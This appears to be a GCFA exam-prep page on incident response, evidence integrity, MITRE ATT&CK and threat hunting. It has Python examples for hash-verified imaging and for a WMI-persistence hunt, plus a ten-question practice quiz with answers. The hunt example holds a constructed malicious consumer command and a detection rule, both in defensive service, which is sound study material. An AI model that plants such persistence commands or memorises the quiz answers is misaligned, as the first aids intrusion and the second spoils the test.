GCFA Exam Prep · Incident Response · FlashGenius

Incident Response & Threat Hunting

PICERL lifecycle, order of volatility, chain of custody, IOC vs. IOA, Pyramid of Pain, MITRE ATT&CK 14 tactics, and hypothesis-driven threat hunting methodology.


Effective DFIR begins with a structured methodology and the discipline to preserve evidence before acting. Every decision in the field has downstream forensic consequences.

GCFA Mindset: Digital forensics is evidence-driven. Before you act, ask: will this action destroy evidence? Before you analyze, ask: is this evidence forensically sound? The order of volatility, chain of custody, and write-blocked imaging aren't procedural checkboxes — they're the foundation that makes everything else legally and analytically defensible.

IR Lifecycle — PICERL (6 Phases)

P · Preparation
Before the incident — build the capability to respond
Develop IR policies, procedures, and playbooks. Deploy logging infrastructure (SIEM, EDR, network monitoring). Build and train the IR team. Establish legal authorization, communication plans, and forensic toolkit readiness. Conduct tabletop exercises.
Key artifacts: IR plan, asset inventory, forensic toolkit inventory, contact lists, legal retainer

I · Identification
Determine IF an incident has occurred and its scope
Detect the event through alerts, user reports, or threat intelligence. Analyze indicators to determine whether this is a genuine security incident vs. a false positive. Define initial scope: which systems, which accounts, what timeframe? Assign incident severity.
Key artifacts: Alert logs, SIEM queries, initial IOC list, incident ticket, severity classification

C · Containment
Limit damage and prevent further spread — preserve evidence
Short-term containment: isolate affected systems from the network while preserving volatile evidence (memory, running processes). Long-term containment: implement network segmentation, disable compromised credentials, block C2 IPs. Critical tension: act fast vs. preserve evidence.
Key artifacts: Memory images (collected BEFORE isolation where possible), network isolation records, firewall block rules

E · Eradication
Remove the threat actor and all persistence mechanisms
Identify and remove malware, backdoors, unauthorized accounts, and all attacker persistence (Run keys, scheduled tasks, WMI subscriptions, services). Patch the vulnerability that enabled initial access. Do NOT eradicate before thorough forensic analysis — premature cleanup destroys evidence.
Key artifacts: Malware samples, persistence mechanism inventory, patch records, credential reset documentation

R · Recovery
Restore systems to normal, verified operation
Restore from clean backups, rebuild affected systems, or validate cleanliness of systems remaining in production. Implement enhanced monitoring for the recovered environment to detect any re-compromise. Phased restoration — most critical business systems first.
Key artifacts: Backup integrity verification, monitoring coverage confirmation, restoration checklist, business sign-off

L · Lessons Learned
Improve future response capability from every incident
Post-incident review (PIR) conducted within 2 weeks. Document root cause, timeline, what worked, what failed, and improvement actions. Update playbooks, detection rules, and training. Calculate cost and impact. Report to leadership. The most underutilized phase.
Key artifacts: Post-incident report, updated IR playbooks, new detection rules, executive summary, cost analysis

Order of Volatility — Evidence Collection Priority

Collect the most volatile evidence first — it will disappear when the system is powered off or rebooted. Per RFC 3227, volatility determines collection sequence.

1. CPU Registers & Cache [Most Volatile]: Processor state; lost in microseconds
2. RAM (Physical Memory) [Critical]: Running processes, network connections, encryption keys, malware artifacts
3. Virtual Memory / Swap / Page File [High]: Overflow from RAM; may contain process fragments and sensitive data
4. Network State [High]: Active connections, routing tables, ARP cache, listening ports
5. Running Processes & Services [Medium]: Process list, open file handles, loaded DLLs
6. Disk (Non-Volatile Storage) [Medium]: File system, registry, event logs, MFT — survives power cycle
7. Remote Logging & Monitoring Data [Lower]: SIEM logs, centralized syslog — may be overwritten by retention policy
8. Archival Media & Backups [Least Volatile]: Tape backups, cold storage — least volatile, longest retention

IOC vs. IOA — Quick Reference

Aspect | 🔵 Indicator of Compromise (IOC) | 🔴 Indicator of Attack (IOA)
Definition | Artifact of a past or ongoing compromise — evidence that something bad happened | Behavioral evidence of an attacker's actions in progress — what they are DOING
Examples | Malware hash, known malicious IP, domain name, file path, registry key | Unusual process spawning cmd.exe, lateral movement via WMI, credential dumping behavior
Detection timing | Reactive — usually detected after the fact; requires known signature | Proactive — can detect novel attacks even without prior knowledge of specific tools
Evasion by attacker | Easy — recompile malware, change IP, rotate domain (trivial to change) | Hard — TTPs represent attacker methodology; changing TTPs requires retooling entire approach
Best for | Threat intelligence sharing, blocklists, known-bad signatures | Threat hunting, behavioral detection, advanced adversary detection

IR Methodology & Evidence Integrity

Sound incident response depends on forensically sound evidence collection. Every action in the field must consider its impact on evidence integrity and legal admissibility.

The Golden Rule: Never work on original evidence. Always acquire a forensic image, verify hash integrity, and work from the copy. If you modify the original — even accidentally — the evidence may be inadmissible and the investigation compromised.

Evidence Integrity — Core Requirements

🔒 Write Blocker
Hardware or software device that intercepts all write commands to the evidence drive, allowing data to be read without any modification. Hardware write blockers are preferred over software — they operate at a lower level and are more reliable. Required for disk imaging of physical drives.

#️⃣ Cryptographic Hashing (MD5/SHA-256)
Generate a hash of the evidence BEFORE and AFTER imaging. If hashes match, evidence is forensically intact. SHA-256 is preferred over MD5 (MD5 is still widely used for forensics but has known collision weaknesses). Record hash values in the chain of custody documentation.

📋 Chain of Custody
Documented, unbroken record of who collected, handled, transferred, analyzed, and stored each piece of evidence. Every transfer must be signed. Gaps in chain of custody can render evidence inadmissible in legal proceedings. Use evidence tags, tamper-evident bags, and a formal custody log.

🖼️ Forensic Imaging (Bit-for-Bit Copy)
Create a complete sector-by-sector copy of the storage media — including deleted files, slack space, and unallocated space. Common formats: E01 (EnCase), DD/raw, AFF4. Standard tools: FTK Imager, dd, dcfldd. ALWAYS work from the forensic image, never the original.

📦 Evidence Preservation & Storage
Store evidence in tamper-evident packaging with evidence tags. Maintain appropriate environmental conditions (antistatic bags for drives). Restrict access to authorized personnel only. Document storage location in chain of custody. Follow legal hold procedures for litigation.
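The hash-before, hash-after check and the custody log described above, as an added worked example (not code from FlashGenius or from any forensic tool). The "evidence drive" is a constructed byte string standing in for media that would really be read through a write blocker, and the evidence tag and handler names are made up; the verification logic itself is the standard one: both hashes must agree, and every custody entry must carry the same SHA-256 or the chain is considered broken.

```python
import hashlib
import json
from dataclasses import dataclass, field
from datetime import datetime, timezone

# Constructed stand-in for an evidence drive: a few KiB of bytes instead of a
# physical disk. In a real acquisition this is read through a write blocker.
EVIDENCE_DRIVE = bytes(range(256)) * 16 + b"MFT record stub; deleted file slack; event log fragment"


def hash_media(data: bytes, chunk_size: int = 4096) -> dict:
    """Hash media in fixed-size chunks, the way an imager streams a drive.
    Returns MD5 (still recorded by many tools) and SHA-256 (preferred)."""
    md5 = hashlib.md5()
    sha256 = hashlib.sha256()
    for offset in range(0, len(data), chunk_size):
        block = data[offset:offset + chunk_size]
        md5.update(block)
        sha256.update(block)
    return {"md5": md5.hexdigest(), "sha256": sha256.hexdigest()}


def acquire_image(source: bytes) -> bytes:
    """Bit-for-bit copy of the source media (dd-style raw image)."""
    return bytes(source)


@dataclass
class CustodyLog:
    """Chain of custody: an append-only list of handling entries, each one
    recording who did what, when, and the evidence hash observed at the time."""
    evidence_id: str
    entries: list = field(default_factory=list)

    def record(self, handler: str, action: str, hashes: dict) -> None:
        self.entries.append({
            "evidence_id": self.evidence_id,
            "handler": handler,
            "action": action,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "sha256": hashes["sha256"],
            "md5": hashes["md5"],
        })

    def unbroken(self) -> bool:
        """True only if every entry reports the same SHA-256 as the first one,
        i.e. no handler in the chain observed a changed evidence item."""
        if not self.entries:
            return False
        first = self.entries[0]["sha256"]
        return all(e["sha256"] == first for e in self.entries)


def verify_acquisition(source: bytes, image: bytes, log: CustodyLog, examiner: str) -> bool:
    """Hash the original before imaging, hash the image after, record both
    in the custody log, and report whether the image is a faithful copy."""
    before = hash_media(source)
    log.record(examiner, "pre-imaging hash of original media", before)
    after = hash_media(image)
    log.record(examiner, "post-imaging hash of forensic image", after)
    return before["sha256"] == after["sha256"] and before["md5"] == after["md5"]


if __name__ == "__main__":
    log = CustodyLog("EVD-0001")  # constructed evidence tag
    image = acquire_image(EVIDENCE_DRIVE)
    print("image verified:", verify_acquisition(EVIDENCE_DRIVE, image, log, "examiner A"))
    # A later analyst re-hashes at hand-off. A single flipped byte in the
    # working copy is enough to show up as a broken chain.
    altered = bytearray(image)
    altered[100] ^= 0x01
    log.record("analyst B", "re-hash at transfer", hash_media(bytes(altered)))
    print("chain unbroken:", log.unbroken())
    print(json.dumps(log.entries, indent=2))
```

The log entry carries both digests because many tools still emit MD5 alongside SHA-256; the chain check, however, compares only SHA-256, since that is the value the page says to prefer.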
Triage Acquisition vs. Full Forensic Acquisition

Dimension | Triage Acquisition | Full Forensic Acquisition
Speed | Fast — targeted collection of key artifacts only | Slow — complete bit-for-bit disk image (hours for large drives)
Completeness | Partial — may miss artifacts not in targeted locations | Complete — captures everything including deleted files, slack space
System state | Can be performed on live running system (preserves volatile data) | Usually requires offline/powered-off system for disk imaging
Legal weight | Lower — may not meet evidentiary standards for court | Higher — full chain of custody, hash verification, forensically sound
Best for | Initial scoping, large enterprise with many systems, IR triage | Deep investigation, litigation, regulatory investigations
Tools | Kansa, CrowdStrike, Velociraptor, KAPE | FTK Imager, EnCase, dd, dcfldd, Autopsy
Live Memory Acquisition — Key Considerations

RAM must be acquired BEFORE system shutdown or isolation where operationally possible. It contains running processes, network connections, decrypted malware, and encryption keys — none of which survive a power cycle.

Tool | Platform | Notes
WinPmem | Windows | Open source; produces raw or AFF4 memory images; requires admin rights
Magnet RAM Capture | Windows | Free; GUI-based; good for first responders; outputs raw memory image
FTK Imager | Windows | Also captures memory (in addition to disk); widely accepted in legal proceedings
LiME (Linux Memory Extractor) | Linux | Loadable kernel module; only method that fully captures kernel memory on Linux
OSXPmem / avml | macOS / Linux | avml is Microsoft's open-source Linux memory acquisition tool
Legal Considerations in IR
Consideration | Details
Authorization | Ensure written authorization from system/data owner before collecting evidence. Corporate IR teams typically operate under employment agreements; law enforcement requires warrants or consent.
Jurisdiction | Cross-border incidents (cloud, remote employees) may trigger multiple legal frameworks (GDPR, CFAA, local law). Engage legal counsel early for multi-jurisdictional incidents.
Privacy Laws | Employee monitoring, personal data collection, and cross-border data transfer all carry legal constraints. GDPR requires data minimization even in IR contexts.
Evidence Admissibility | For criminal prosecution: chain of custody, forensically sound collection, and expert witness qualification. Corporate investigations have lower evidentiary bars but should still follow best practices.
Notification Obligations | Regulatory breach notification timelines vary: GDPR = 72 hours; HIPAA = 60 days; SEC = 4 business days (material incidents). Engage legal before notifying regulators.

Threat Hunting

Threat hunting is a proactive, hypothesis-driven search for threats that have evaded automated detection. Unlike alert-driven IR, hunting assumes the adversary is already inside.

Hunting Assumption: Threat hunters operate under the assumption of breach — the adversary is already present and has evaded existing controls. Hunting is not reactive to alerts; it is a proactive, human-driven analytical process that seeks unknown threats by examining behaviors, anomalies, and TTPs.

Pyramid of Pain (David Bianco, 2013)

Ranks threat indicators by how much pain it causes an attacker when defenders detect and block them. Higher = harder for the attacker to change = more valuable detection.

6. TTPs — Tactics, Techniques & Procedures [Tough!]: Attacker methodology; requires complete retooling to change
5. Tools — Malware, attack frameworks (Cobalt Strike, Mimikatz) [Challenging]: Takes time and money to develop or replace tooling
4. Network / Host Artifacts — Registry keys, mutexes, file paths [Annoying]: Requires modifying operational tradecraft; annoying to change
3. Domain Names — C2 domains, phishing domains [Simple]: Can rotate but costs time and money (registration, infra)
2. IP Addresses — C2 IPs, proxy nodes [Easy]: Easy to rotate through bulletproof hosting or VPS providers
1. Hash Values — MD5/SHA-256 of malware files [Trivial]: Trivial — recompile or change one byte; hash changes immediately

Hypothesis-Driven Hunting Workflow

1. Form Hypothesis
   Start with a specific, testable hypothesis: "An attacker may have used WMI for persistence on workstations in Finance." Hypotheses are driven by threat intel, ATT&CK techniques, or prior incidents.
2. Identify Data Sources
   Determine which logs and artifacts would contain evidence. WMI persistence → WMI repository, Event ID 5857/5858, Sysmon Event ID 19/20/21, PowerShell logs, registry artifacts.
3. Collect & Query Data
   Extract relevant data using SIEM queries, EDR telemetry, or forensic tools. Apply filters to reduce noise while preserving true positives. Analyze patterns across the target population.
4. Analyze & Investigate
   Manually analyze results for anomalies. Correlate across data sources (process creation + network + registry). Distinguish malicious activity from legitimate admin tools (LOLBins).
5. Respond or Tune
   If threat found: escalate to IR. If not found: the investigation produces new knowledge — document findings, update threat models, and create detection rules to automate future hunting.
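The WMI-persistence hunt that the five steps above walk through, carried out end to end as an added example (this is not FlashGenius code, and it is not a Sysmon or SIEM feature). The hypothesis is the one in step 1, the data source is the Sysmon WMI events (IDs 19, 20, 21) named in step 2, and the analysis in step 4 is the correlation of filter, consumer and binding per host. The events are constructed for this example with field names that follow Sysmon's WMI event schema; the allowlist of known-good bindings is an assumption standing in for the baseline an analyst would build for their own environment.

```python
import re

# Constructed Sysmon WMI events in simplified key/value form. Field names
# follow Sysmon's schema for Event IDs 19 (filter), 20 (consumer) and
# 21 (binding); hosts, users and values are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 19, "Computer": "FIN-WS01", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Name": "SCM Event Log Filter", "EventNamespace": "root\\subscription",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Computer": "FIN-WS01", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Name": "SCM Event Log Consumer", "Type": "NTEventLogEventConsumer", "Destination": ""},
    {"EventID": 21, "Computer": "FIN-WS01", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
    {"EventID": 19, "Computer": "FIN-WS07", "Operation": "Created", "User": "CORP\\svc_backup",
     "Name": "Updater", "EventNamespace": "root\\subscription",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
              "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": 20, "Computer": "FIN-WS07", "Operation": "Created", "User": "CORP\\svc_backup",
     "Name": "Updater", "Type": "CommandLineEventConsumer",
     "Destination": "cmd.exe /c C:\\ProgramData\\sync.bat"},  # constructed value
    {"EventID": 21, "Computer": "FIN-WS07", "Operation": "Created", "User": "CORP\\svc_backup",
     "Consumer": 'CommandLineEventConsumer.Name="Updater"',
     "Filter": '__EventFilter.Name="Updater"'},
]

# Consumer classes that run arbitrary code when their filter fires.
CODE_EXEC_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}

# Assumed baseline: the SCM Event Log binding is present on a default Windows
# install. A real hunt would build this allowlist from a known-clean host.
KNOWN_GOOD_BINDINGS = {("SCM Event Log Filter", "SCM Event Log Consumer")}

# Sysmon writes binding references as  Class.Name="instance name".
_REF = re.compile(r'(?P<cls>\w+)\.Name="(?P<name>[^"]*)"')


def parse_ref(ref: str) -> tuple:
    """Split a Sysmon binding reference into (class, instance name)."""
    m = _REF.match(ref)
    return (m.group("cls"), m.group("name")) if m else (None, ref)


def hunt_wmi_persistence(events: list) -> list:
    """Step 4 of the workflow: correlate filter (19), consumer (20) and binding (21)
    per host, drop known-good bindings, and flag bindings whose consumer executes code."""
    filters, consumers, bindings = {}, {}, []
    for e in events:
        if e["EventID"] == 19:
            filters[(e["Computer"], e["Name"])] = e
        elif e["EventID"] == 20:
            consumers[(e["Computer"], e["Name"])] = e
        elif e["EventID"] == 21:
            bindings.append(e)

    findings = []
    for b in bindings:
        host = b["Computer"]
        _, filter_name = parse_ref(b["Filter"])
        consumer_cls, consumer_name = parse_ref(b["Consumer"])
        if (filter_name, consumer_name) in KNOWN_GOOD_BINDINGS:
            continue  # step 5 feedback: baseline entries are tuned out
        consumer = consumers.get((host, consumer_name), {})
        flt = filters.get((host, filter_name), {})
        consumer_type = consumer.get("Type", consumer_cls)
        if consumer_type in CODE_EXEC_CONSUMERS:
            findings.append({
                "host": host,
                "user": b.get("User"),
                "technique": "T1546.003",  # ATT&CK: WMI Event Subscription
                "filter": filter_name,
                "query": flt.get("Query"),
                "consumer_type": consumer_type,
                "destination": consumer.get("Destination"),
            })
    return findings


if __name__ == "__main__":
    for f in hunt_wmi_persistence(SAMPLE_EVENTS):
        print(f)
```

A binding (Event ID 21) is the pivot rather than the filter or consumer alone, because a filter or consumer that is never bound does nothing; the consumer class is what decides severity, since NTEventLogEventConsumer only writes an event log entry while the two classes in CODE_EXEC_CONSUMERS run a command or script. The allowlist is where step 5 feeds back: each confirmed-benign binding found on a hunt is added so the next run is quieter.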

Hunting Maturity Model (HMM — Sqrrl, 2015)

Level 0 · Initial · Alert-Dependent
Organization relies entirely on automated alerts. No proactive hunting. Detection capability limited to known signatures. The adversary operates freely between alerts.

Level 1 · Minimal · IOC-Driven Hunting
Threat intel feeds drive ad-hoc searches for known IOCs (hashes, IPs, domains). Reactive, not proactive. Limited to what is already known — misses novel TTPs.

Level 2 · Procedural · Hypothesis-Driven
Analysts develop hunting hypotheses based on threat intelligence and ATT&CK. Structured hunts follow documented procedures. Detection logic starts to be formalized.

Level 3 · Innovative · Analytics & ML
Custom analytics, machine learning, and behavioral baselines enable detection of unknown unknowns. Hunting output drives continuous improvement of automated detection. The gold standard.
Key Threat Hunting Data Sources
Data Source | What to Hunt | Key Evidence
Windows Event Logs | Logon anomalies, privilege escalation, service creation | Event IDs 4624/4625/4648 (logon), 4688 (process), 7045 (service install), 4698 (scheduled task)
Sysmon Logs | Process creation, network connections, file writes, registry changes | Event IDs 1 (process), 3 (network), 11 (file create), 13 (registry), 19-21 (WMI)
PowerShell Logs | Encoded commands, download cradles, AMSI bypass attempts | Module logging (4103), Script block logging (4104), Transcription logs
Network Traffic / DNS | C2 beaconing, DNS tunneling, lateral movement, data staging | Unusual outbound connections, high-entropy DNS queries, periodic beaconing patterns
EDR Telemetry | Process injection, credential dumping, LOLBin abuse | Parent-child process anomalies, lsass.exe access, unusual DLL loads
Proxy / Web Gateway | C2 over HTTP/HTTPS, staged payload downloads | User agent anomalies, low-reputation domains, unusual POST-heavy sessions

MITRE ATT&CK Framework

ATT&CK (Adversarial Tactics, Techniques & Common Knowledge) is a globally accessible knowledge base of adversary behaviors based on real-world observations — the essential reference for DFIR practitioners.

ATT&CK Hierarchy: Tactics = the adversary's goal (the "why" — 14 enterprise tactics). Techniques = the method used to achieve the tactic (the "how" — 200+ techniques). Sub-techniques = specific implementation of a technique. Procedures = the exact implementation a named threat actor uses (the "who and what specifically").

14 Enterprise ATT&CK Tactics — In Attack Sequence Order

1. Reconnaissance (TA0043)
   Gather info before the attack: OSINT, scanning, phishing for intel
2. Resource Development (TA0042)
   Build capabilities: buy domains, stage malware, compromise infra
3. Initial Access (TA0001)
   Get a foothold: phishing, exploit public-facing app, supply chain
4. Execution (TA0002)
   Run malicious code: PowerShell, WMI, scheduled tasks, cmd.exe
5. Persistence (TA0003)
   Maintain foothold: Run keys, services, WMI subscriptions, scheduled tasks
6. Privilege Escalation (TA0004)
   Gain higher permissions: token impersonation, UAC bypass, exploit
7. Defense Evasion (TA0005)
   Avoid detection: obfuscation, LOLBins, log clearing, timestomping
8. Credential Access (TA0006)
   Steal credentials: Mimikatz, LSASS dump, credential harvesting
9. Discovery (TA0007)
   Learn the environment: network scan, account enumeration, file discovery
10. Lateral Movement (TA0008)
   Pivot to other systems: PsExec, WMI, pass-the-hash, RDP
11. Collection (TA0009)
   Gather target data: keylogging, screen capture, clipboard, file staging
12. Command & Control (TA0011)
   Communicate with attacker: C2 beaconing over HTTP/DNS, tunneling
13. Exfiltration (TA0010)
   Steal data: exfil over C2, cloud storage, encrypted channels
14. Impact (TA0040)
   Final objective: ransomware, data destruction, defacement, wiper
High-Frequency GCFA Techniques by Tactic
Tactic | Key Technique | ATT&CK ID | Forensic Evidence
Initial Access | Phishing: Spearphishing Attachment | T1566.001 | Email headers, .lnk files, macro-enabled Office docs, browser downloads
Execution | PowerShell | T1059.001 | Event ID 4103/4104, ConsoleHost_history.txt, Prefetch for powershell.exe
Persistence | Registry Run Keys / Startup Folder | T1547.001 | HKCU/HKLM Run keys in registry, Startup folder contents
Persistence | Scheduled Task/Job | T1053.005 | Event ID 4698/4702, C:\Windows\System32\Tasks\, XML task files
Defense Evasion | Indicator Removal: Clear Windows Event Logs | T1070.001 | Event ID 1102 (Security log cleared), 104 (System log cleared)
Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 | Sysmon Event ID 10 (lsass.exe access), minidump files, Mimikatz artifacts
Lateral Movement | Remote Services: SMB/Windows Admin Shares | T1021.002 | Event ID 4624 Type 3 (network logon), net use commands, named pipes
Command & Control | Application Layer Protocol: Web Protocols | T1071.001 | Unusual outbound HTTP/HTTPS, periodic beaconing, proxy logs, DNS queries
ATT&CK Applied to DFIR Investigations
DFIR Use Case | How ATT&CK Helps
Threat Hunting | Use ATT&CK techniques as hunting hypotheses: "Hunt for T1055 Process Injection across all endpoints"
Incident Scoping | Map observed artifacts to ATT&CK techniques to build a complete picture of attacker activity across the kill chain
Gap Analysis | Compare ATT&CK techniques used by relevant threat actors against your detection coverage — find blind spots
Threat Intelligence | ATT&CK groups (threat actors) document which TTPs each named group uses — enables predictive hunting
IR Report Writing | Map every observed attacker action to an ATT&CK ID for standardized, communicable incident reporting
Detection Engineering | Build SIEM rules and EDR detections targeted at specific ATT&CK technique artifacts and behaviors

Practice Quiz — Incident Response & Threat Hunting

10 questions covering PICERL, order of volatility, evidence integrity, IOC vs. IOA, Pyramid of Pain, and MITRE ATT&CK. The explanation following each question's options gives the correct answer and the reasoning behind it.

Question 1 of 10
What is the correct sequence of the six phases in the PICERL incident response lifecycle?
A Identification → Preparation → Containment → Eradication → Recovery → Lessons Learned
B Preparation → Identification → Containment → Eradication → Recovery → Lessons Learned
C Preparation → Containment → Identification → Eradication → Recovery → Lessons Learned
D Identification → Containment → Preparation → Recovery → Eradication → Lessons Learned
The PICERL sequence is: Preparation (before the incident — build capability), Identification (determine if an incident occurred and scope), Containment (limit spread, preserve evidence), Eradication (remove threat actor and persistence), Recovery (restore normal operations), Lessons Learned (post-incident review, improve capability). Preparation must come first — you cannot respond effectively without prior planning.
Question 2 of 10
Per the order of volatility, which evidence source should be collected FIRST during an incident response on a live system?
A Hard disk forensic image using FTK Imager
B Windows Event Logs from the System and Security channels
C RAM (physical memory) acquisition using a memory capture tool
D Network packet capture using Wireshark on the affected segment
RAM is the most critical volatile evidence — it contains running processes, network connections, decrypted malware, encryption keys, and attacker tooling that exist nowhere else. It is completely lost on shutdown or reboot. Per RFC 3227's order of volatility: CPU registers → RAM → Swap/Page file → Network state → Running processes → Disk. Disk evidence (Event Logs, forensic image) survives a power cycle and can be collected later. Memory cannot.
Question 3 of 10
What distinguishes an Indicator of Attack (IOA) from an Indicator of Compromise (IOC)?
A IOAs are found in memory; IOCs are found exclusively on disk
B IOAs focus on attacker behavior and intent; IOCs are artifacts of past compromise
C IOCs are more valuable for detecting advanced threats than IOAs
D IOAs are only used by government threat intelligence teams
IOCs (Indicators of Compromise) are artifacts of past compromise — hashes, IPs, domains, file paths. They are reactive and easily evaded (attackers can recompile malware to change the hash in seconds). IOAs (Indicators of Attack) focus on attacker behavior — what they are doing, not what tools they used. IOAs detect intent: unusual process spawning, credential dumping behavior, LOLBin abuse. IOAs are far harder to evade because changing TTPs requires the attacker to retool their entire methodology.
Question 4 of 10
In the MITRE ATT&CK framework, which component represents the adversary's high-level objective — the tactical goal that explains WHY a technique is used?
A Technique — the specific method used to achieve a goal
B Sub-technique — a more granular implementation of a technique
C Tactic — the adversary's tactical goal explaining why a technique is employed
D Procedure — the specific implementation by a named threat actor group
The ATT&CK hierarchy: Tactic = the "why" (adversary's goal, e.g., Persistence); Technique = the "how" (method used, e.g., Registry Run Keys); Sub-technique = more specific implementation (e.g., HKCU Run Key specifically); Procedure = named actor's exact implementation (e.g., APT29 uses HKCU Software\Microsoft\Windows\CurrentVersion\Run to execute a specific backdoor). Tactics answer "why"; techniques answer "how"; procedures answer "who does what exactly."
Question 5 of 10
An IR responder discovers an active intrusion on a Windows workstation. Which action should be performed FIRST to preserve the most valuable volatile evidence?
A Power off the workstation immediately to freeze its current state
B Disconnect the workstation from the network to prevent further attacker access
C Acquire a memory image of the running system before any other action
D Run antivirus to identify and quarantine the malware
Acquiring RAM first is the correct priority — it is the most volatile evidence and is lost the moment the system is powered off or rebooted. Memory contains running malware (which may not be on disk at all — fileless malware), active network connections to C2 servers, decryption keys, credentials in plaintext, and attacker tooling. Powering off destroys all of this. Network isolation is next (prevent further spread), but only after memory is captured. Running AV modifies evidence and should never be done before forensic acquisition.
Question 6 of 10
Chain of custody documentation is PRIMARILY maintained to ensure:
A The incident response process is completed within the agreed SLA timeframe
B Digital evidence remains legally admissible and its integrity can be demonstrated in court
C The IR team can prioritize which systems to analyze first based on business value
D Executive leadership can track the cost of the incident for insurance reimbursement
Chain of custody is an unbroken, documented record of who collected, handled, transferred, and analyzed each piece of evidence. Its primary purpose is legal admissibility — demonstrating that evidence was not tampered with between collection and presentation in court. Breaks in chain of custody (unaccounted time, unsigned transfers, unlocked storage) allow defense attorneys to challenge evidence integrity. Even in corporate investigations without litigation intent, chain of custody is best practice — the nature of incidents can change rapidly.
Question 7 of 10
A threat hunter develops the hypothesis: "An attacker may have used WMI event subscriptions for persistence on endpoints." This hunting approach is BEST classified as:
A IOC-driven hunting — searching for specific known-bad file hashes or IP addresses
B Intel-driven hunting — using external threat intelligence reports as the primary driver
C TTP-based hunting — searching for attacker behaviors and techniques regardless of specific tooling used
D Anomaly-based hunting — searching for statistical deviations from behavioral baselines
TTP-based hunting focuses on attacker behaviors — how they operate — rather than known artifacts (IOC-driven) or specific intelligence reports (intel-driven). "WMI event subscriptions for persistence" is T1546.003 in ATT&CK — a specific technique that represents attacker behavior. TTP-based hunting is powerful because it detects threats even when attackers change their tools, IPs, or domains. It sits near the top of the Pyramid of Pain — TTPs are what cause maximum pain when defenders can detect them.
Question 8 of 10
What is the PRIMARY purpose of using a hardware write blocker during forensic disk acquisition?
A To accelerate the imaging process by optimizing read throughput from the evidence drive
B To compress the forensic image automatically during the acquisition process
C To prevent any accidental or automatic modification to the original evidence drive
D To authenticate the forensic examiner's identity before granting access to the drive
A write blocker intercepts all write commands at the hardware level, allowing the forensic examiner to read data from the evidence drive without any possibility of modifying it — even accidentally (e.g., Windows auto-updating timestamps when it mounts a drive). Modifying original evidence violates forensic integrity and may make evidence inadmissible. Hardware write blockers are preferred over software write blockers because they operate at a lower, more reliable level. After imaging, hash values confirm the image matches the original.
Question 9 of 10
Which MITRE ATT&CK tactic describes the adversary's efforts to avoid detection throughout the intrusion — including log deletion, obfuscation, and timestomping?
A Initial Access — techniques to gain entry into the target network
B Persistence — techniques to maintain a foothold after initial access
C Privilege Escalation — techniques to gain higher-level permissions
D Defense Evasion — techniques to avoid detection by security tools and analysts
Defense Evasion (TA0005) encompasses all techniques adversaries use to avoid detection: log clearing (T1070.001), timestomping (T1070.006), indicator removal, obfuscation/encoding, masquerading as legitimate processes, disabling security tools, and LOLBin (Living-off-the-Land Binary) abuse to blend into normal activity. It is the most populated ATT&CK tactic — because adversaries work hard to avoid detection throughout the entire intrusion. Forensically, evidence of defense evasion (e.g., Event ID 1102 — Security log cleared) is itself a significant finding.
Question 10 of 10
According to the Pyramid of Pain (David Bianco), which indicator type causes the MOST pain for an attacker when detected and blocked by defenders?
A Hash values — MD5/SHA-256 of malware files
B TTPs — Tactics, Techniques, and Procedures
C IP addresses — known C2 server addresses
D Domain names — C2 or phishing domains
TTPs (Tactics, Techniques, and Procedures) sit at the top of the Pyramid of Pain — they are the hardest for attackers to change. TTPs represent the attacker's fundamental methodology — how they operate, think, and execute. Changing TTPs requires a complete retooling of the attack approach, significant time, and money. In contrast, a file hash can be changed in seconds (recompile with one character difference), IPs and domains can be rotated in hours. This is why TTP-based detection (behavioral detection) is the gold standard — it remains effective regardless of tooling changes.

Memory Hooks

High-yield mnemonics and patterns to lock in IR & Threat Hunting for the GCFA.

🚨 PICERL — IR Lifecycle Order
Preparation (build before) → Identification (detect & scope) → Containment (limit spread, preserve evidence) → Eradication (remove threat) → Recovery (restore operations) → Lessons Learned (improve). Critical: never skip to Eradication before full forensic analysis — you'll destroy evidence.
Mnemonic: "Please Identify Criminals Even Remotely Located" — or just remember PICERL as one word. The order matters — E before R, always.
Order of Volatility — Collect First to Last
RAM first (lost on shutdown) → Swap/Page file → Network state → Running processes → Disk (survives power cycle) → Remote logs → Archives. The rule: if it disappears when you pull the power cable, collect it FIRST. Memory is everything — fileless malware exists ONLY in RAM.
Mnemonic: "RAM Never Persists — Disk Remains Later Always" — RAM, Network, Processes, Disk, Remote Logs, Archives
🔺 Pyramid of Pain — Bottom to Top
Hash (trivial) → IP (easy) → Domain (simple) → Network/Host artifacts (annoying) → Tools (challenging) → TTPs (tough!). Higher = harder for attacker to change = more valuable detection. Hash-based detection = playing whack-a-mole. TTP detection = catching the attacker regardless of what tools they use.
Mnemonic: "Hackers In Dark Nights Take Trophies" — Hash, IP, Domain, Network artifacts, Tools, TTPs (bottom to top)
🎯 IOC vs. IOA — The Key Difference
IOC = artifact (what was left behind — past tense). IOA = behavior (what the attacker IS doing — present tense). IOCs are reactive and easily evaded; IOAs detect intent regardless of tooling. The exam tests this distinction constantly: "attacker changes hash" → IOC useless, IOA still works.
Mnemonic: "IOC = what they LEFT, IOA = what they DO" — Compromise = artifact; Attack = action.
🗺️ 14 ATT&CK Tactics — In Order
Recon → Resource Dev → Initial Access → Execution → Persistence → Privilege Esc → Defense Evasion → Credential Access → Discovery → Lateral Movement → Collection → C2 → Exfiltration → Impact. The first two (Recon, Resource Dev) happen before the attack. Defense Evasion is most populated. Impact is the final goal.
Mnemonic: "Really Resourceful Initial Encounters Prompt Pretty Determined Criminals Doing Lateral Collection C2 Exfil Impact" — first letter of each tactic
🔬 Evidence Integrity Triad
Three non-negotiables for forensically sound evidence: Write blocker (prevent modification), Hash verification (prove no change — before AND after imaging), Chain of custody (document all handling). Miss any one → evidence challenged in court. Work from image, never original.
Mnemonic: "Write, Hash, Chain" — three words, three requirements. Add: "Never touch the original" as a fourth commandment.
